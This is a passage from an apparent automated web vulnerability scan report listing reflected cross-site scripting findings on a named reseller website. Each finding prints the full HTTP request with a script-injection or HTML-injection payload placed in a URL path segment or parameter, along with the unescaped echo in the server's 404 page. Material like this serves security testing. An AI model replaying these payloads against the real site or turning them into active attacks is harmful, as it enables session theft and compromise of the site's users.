<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/86d140<script>alert(1)</script>74c3cfb5868/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3714. http://www.resellerbase.com/detail/8/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 71782<script>alert(1)</script>cf8942b094 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes71782<script>alert(1)</script>cf8942b094/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes71782<script>alert(1)</script>cf8942b094/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3715. http://www.resellerbase.com/detail/8/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b0f4c<script>alert(1)</script>cf4abe4a21e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmosb0f4c<script>alert(1)</script>cf4abe4a21e/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmosb0f4c<script>alert(1)</script>cf4abe4a21e/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3716. http://www.resellerbase.com/detail/8/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 604d3<script>alert(1)</script>6075dbec776 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos/search.php604d3<script>alert(1)</script>6075dbec776?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/search.php604d3<script>alert(1)</script>6075dbec776?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3717. http://www.resellerbase.com/detail/8/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload cab14<a>b92b6de4ac5 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/8/themes/kosmos/search.php?keyword=search...&Submit3=Searchcab14<a>b92b6de4ac5&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/search.php?keyword=search...&Submit3=Searchcab14<a>b92b6de4ac5&opt=2 was not found on this server.</p>
...[SNIP]...

2.3718. http://www.resellerbase.com/detail/8/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 2b39b<a>9f8743c2d19 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/8/themes/kosmos/search.php?keyword=search...2b39b<a>9f8743c2d19&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/search.php?keyword=search...2b39b<a>9f8743c2d19&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3719. http://www.resellerbase.com/detail/8/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 94b66<script>alert(1)</script>6ee7dbdc6d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&94b66<script>alert(1)</script>6ee7dbdc6d2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&94b66<script>alert(1)</script>6ee7dbdc6d2=1 was not found on this server.</p>
...[SNIP]...

2.3720. http://www.resellerbase.com/detail/8/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload ad75e<a>7be209a0ff7 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/8/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2ad75e<a>7be209a0ff7 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2ad75e<a>7be209a0ff7 was not found on this server.</p>
...[SNIP]...

2.3721. http://www.resellerbase.com/detail/8/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4fa32<script>alert(1)</script>07d6e6d8ca8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail4fa32<script>alert(1)</script>07d6e6d8ca8/8/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail4fa32<script>alert(1)</script>07d6e6d8ca8/8/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3722. http://www.resellerbase.com/detail/8/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload be356<script>alert(1)</script>fb6d3919e88 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8be356<script>alert(1)</script>fb6d3919e88/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8be356<script>alert(1)</script>fb6d3919e88/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3723. http://www.resellerbase.com/detail/8/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7a370<script>alert(1)</script>8339186d2d8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes7a370<script>alert(1)</script>8339186d2d8/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes7a370<script>alert(1)</script>8339186d2d8/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3724. http://www.resellerbase.com/detail/8/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c303e<script>alert(1)</script>0015c63ee34 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/search.phpc303e<script>alert(1)</script>0015c63ee34?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/search.phpc303e<script>alert(1)</script>0015c63ee34?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3725. http://www.resellerbase.com/detail/8/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload cf567<a>73a21530adf was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/8/themes/search.php?keyword=search...&Submit3=Searchcf567<a>73a21530adf&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/search.php?keyword=search...&Submit3=Searchcf567<a>73a21530adf&opt=2 was not found on this server.</p>
...[SNIP]...

2.3726. http://www.resellerbase.com/detail/8/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 2e6e2<a>8579b092af4 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/8/themes/search.php?keyword=search...2e6e2<a>8579b092af4&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/search.php?keyword=search...2e6e2<a>8579b092af4&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3727. http://www.resellerbase.com/detail/8/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 729ec<script>alert(1)</script>a3c53a9563 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/search.php?keyword=search...&Submit3=Search&opt=2&729ec<script>alert(1)</script>a3c53a9563=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/search.php?keyword=search...&Submit3=Search&opt=2&729ec<script>alert(1)</script>a3c53a9563=1 was not found on this server.</p>
...[SNIP]...

2.3728. http://www.resellerbase.com/detail/8/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload eaa9e<a>8da13071de0 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/8/themes/search.php?keyword=search...&Submit3=Search&opt=2eaa9e<a>8da13071de0 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/search.php?keyword=search...&Submit3=Search&opt=2eaa9e<a>8da13071de0 was not found on this server.</p>
...[SNIP]...

2.3729. http://www.resellerbase.com/detail/9/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 56f5a<script>alert(1)</script>7c8ec818a53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail56f5a<script>alert(1)</script>7c8ec818a53/9/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail56f5a<script>alert(1)</script>7c8ec818a53/9/ was not found on this server.</p>
...[SNIP]...

2.3730. http://www.resellerbase.com/detail/9/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7c4e7<script>alert(1)</script>0c05ab04bb9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/97c4e7<script>alert(1)</script>0c05ab04bb9/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/97c4e7<script>alert(1)</script>0c05ab04bb9/ was not found on this server.</p>
...[SNIP]...

2.3731. http://www.resellerbase.com/detail/9/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b2689<script>alert(1)</script>dddbb8b7002 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/?b2689<script>alert(1)</script>dddbb8b7002=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/?b2689<script>alert(1)</script>dddbb8b7002=1 was not found on this server.</p>
...[SNIP]...

2.3732. http://www.resellerbase.com/detail/9/netapplications-com.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/netapplications-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dd2dd<script>alert(1)</script>ca324181367 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaildd2dd<script>alert(1)</script>ca324181367/9/netapplications-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
